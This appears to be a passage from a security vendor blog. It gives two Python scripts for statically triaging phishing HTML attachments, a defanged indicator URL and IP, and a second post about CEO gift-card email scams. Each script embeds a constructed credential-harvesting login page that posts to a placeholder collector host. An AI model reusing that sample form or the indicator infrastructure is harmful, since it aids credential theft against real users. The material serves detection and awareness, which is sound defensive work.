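Two properties of the attachment described above are mechanically checkable without opening it in a browser: the login form posts somewhere outside the organization, and the recipient’s address is already baked into the file. The following is an added example, not Cofense tooling or code from the post, of a static analyzer for an HTML attachment that harvests every form, its action target and its input fields, and reports a password form posting to an external host and any pre-populated email address. The sample attachment, its collector host and the victim address are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormHarvester(HTMLParser):
    """Collect every <form> with its action, method and <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        # Bare attributes such as 'readonly' arrive with value None; normalise to ""
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": (a.get("method") or "get").lower(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({"type": (a.get("type") or "text").lower(),
                                            "name": a.get("name", ""),
                                            "value": a.get("value", "")})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyze_html_attachment(html_text):
    """Return human-readable findings for credential-harvesting traits in an HTML attachment."""
    parser = FormHarvester()
    parser.feed(html_text)
    parser.close()
    findings = []
    for form in parser.forms:
        field_types = {f["type"] for f in form["inputs"]}
        # An absolute action URL means the file, opened locally, will send the form off-box
        host = urlparse(form["action"]).hostname or ""
        if "password" in field_types and host:
            findings.append(f"credential form ({form['method'].upper()}) posts to external host {host}")
        for field in form["inputs"]:
            if field["type"] in ("email", "text", "hidden") and "@" in field["value"]:
                findings.append(f"pre-populated address in field '{field['name']}': {field['value']}")
    return findings


# Constructed stand-in for the attachment: a login form over a blurred "invoice" background,
# with the recipient's address hard-coded so only the password is asked for.
SAMPLE_HTML_ATTACHMENT = """<html><body style="background:url(invoice_blur.png)">
<form id="signin" method="post" action="https://collector.example/scn/hope.php">
  <input type="email" name="login" value="jane.doe@victim.example" readonly>
  <input type="password" name="passwd" placeholder="Password">
  <button type="submit">Sign in</button>
</form>
</body></html>"""

if __name__ == "__main__":
    for finding in analyze_html_attachment(SAMPLE_HTML_ATTACHMENT):
        print("-", finding)
```

The pre-populated address is worth surfacing on its own: it tells the analyst that the file was generated per recipient, which in turn suggests the sender already holds a target list for the organization. The parser only sees markup that is present in the file; kits that build the form or set its action from JavaScript need a sandboxed render rather than this static pass.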

Because one of the customers hit by this campaign uses Cofense Vision to automatically quarantine emails, that customer was able to remove the email from 40 unique inboxes, reducing the risk of users giving away their credentials.

Cofense continues to observe HTML / HTM attachments as the top attachment type reaching the inbox and leading to credential theft. Cofense Vision sits behind the SEG and offers an effective and unique phishing defense: a network of people reporting suspicious emails allows a single reported email to be used to mitigate an attack across an entire organization. Reach out to learn more.
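The two traits described above, a password prompt inside a file the user opened from disk and a form that ships that field to a remote server, are what an analyst would check first when triaging a reported HTML attachment. The following script is an added example written for this article; it is not Cofense or PDC tooling. The sample attachment, the recipient address and the collection URL (phish.example) are all constructed placeholders, not the campaign's indicators.

```python
"""Static triage of a reported .html/.htm attachment for credential-harvesting traits.

Added example for this article; not Cofense tooling. SAMPLE_ATTACHMENT is
constructed to mirror the traits the PDC described (a Microsoft-style login
form, a pre-filled recipient address, and a form posting to an external PHP
endpoint); every host and address in it is a placeholder.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

SAMPLE_ATTACHMENT = """<!doctype html>
<html><body>
<div class="doc">Invoice #4471 - amount due</div>
<form id="login" method="post" action="https://phish.example/scn/collect.php">
  <input type="email" name="login" value="recipient@corp.example" readonly>
  <input type="password" name="passwd" placeholder="Password">
  <button type="submit">Sign in</button>
</form>
<script>document.getElementById('login').style.display='block';</script>
</body></html>
"""


class _FormScanner(HTMLParser):
    """Collect the attributes that matter for a credential-form verdict."""

    def __init__(self):
        super().__init__()
        self.form_actions = []      # every <form action=...> seen
        self.password_fields = 0    # count of <input type="password">
        self.prefilled_emails = []  # input values that look like an address
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # boolean attributes such as readonly map to None
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input":
            if (a.get("type") or "").lower() == "password":
                self.password_fields += 1
            value = a.get("value") or ""
            if "@" in value and "." in value.rsplit("@", 1)[-1]:
                self.prefilled_emails.append(value)
        elif tag == "script":
            self.script_tags += 1


def external_hosts(actions):
    """Hosts a form would submit to. A file opened from disk has no legitimate
    origin, so any absolute http(s) action is a remote collection point."""
    hosts = []
    for action in actions:
        parsed = urlparse(action)
        if parsed.scheme in ("http", "https") and parsed.hostname:
            hosts.append(parsed.hostname)
    return hosts


def triage_html_attachment(html):
    """Return the extracted traits and a verdict for one attachment body."""
    scanner = _FormScanner()
    scanner.feed(html)
    hosts = external_hosts(scanner.form_actions)
    # The signal is the combination: a password prompt in a local file plus a
    # form that sends that field to a remote host.
    suspicious = scanner.password_fields > 0 and len(hosts) > 0
    return {
        "password_fields": scanner.password_fields,
        "post_hosts": hosts,
        "prefilled_emails": scanner.prefilled_emails,
        "script_tags": scanner.script_tags,
        "verdict": "credential-harvest-likely" if suspicious else "review",
    }


if __name__ == "__main__":
    print(triage_html_attachment(SAMPLE_ATTACHMENT))
```

The pre-filled address is reported separately rather than folded into the verdict: it is strong corroboration that the file was generated per recipient, but a legitimate SaaS notification can also carry the user's address, so on its own it should raise priority, not decide the case.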

Indicators of Compromise                      IP
hXXps://warrenlawomaha[.]com/scn/hope.php     103.125.218.44

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats. Past performance is not indicative of future results.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

BEC: CEO Gift Card Scams

Author: Tonia Dudley

Over the years we’ve seen the evolution of topics and content related to Business Email Compromise, CEO Fraud, or whatever you want to label this category of phishing. We like to call it what it is: conversational phishing. There are no links or attachments, just an attempt to draw the recipient into a conversation that leads to a task. The threat actor constantly adjusts the lure and context to avoid AI/ML detection. Lately their tactic is to quickly move the conversation to another communication channel, SMS or WhatsApp for example.

I was recently catching up with a friend and, as we were wrapping up our conversation, she said, “Oh, speaking of cybersecurity, I had this really strange email yesterday.” I knew exactly where she was going with this conversation and just let her tell me her story. As you read her story, keep in mind that she is a C-suite executive reporting directly to the CEO, and that she had only been in her role for a month. It went something like this:

As she was wrapping up her Friday, she did one last check of her email on another platform used by a peer organization. She saw an email from her CEO asking for her cell phone number. At first glance, she knew he was on a personal vacation and thought maybe he had only taken his personal cell with him and didn’t have her cell phone number. She quickly reached out to her peer, but got no response; it was late Friday afternoon. Nor did Mark respond when she texted him.

Figure 1: Phishing Email

Since she couldn’t get hold of anyone to validate the request, she responded and began the text exchange shown in Figures 2-5, then headed off to buy the requested gift cards. As you can see in the exchange, it’s clear she thought she was chatting with Mark and was making every effort to meet the demands of the request. As she reached the final step of texting a picture of the code, she decided to do one last check with her CEO and tried once more to call him directly. He explained that he was on vacation and would never ask her to buy gift cards. Although she had already scratched off the cover to get the code, in the parking lot after making the purchase, she was able to walk back into the store and get a refund of her personal money.

Figures 2-5: SMS Message Exchange

In this scenario, Ruth was lucky to be able to get a refund for the purchase she had just made; many are not. Because the dollar amounts of these losses tend to be low, they are very rarely reported to law enforcement.

In our Annual Report webinar series, we break down the various tactics seen in these scams and how they have evolved. We also cover some ways you can protect your organization by making your employees aware of these tactics. On May 25, we will provide in-depth insights on BEC and best practices for educating your employees to prevent situations like the one above.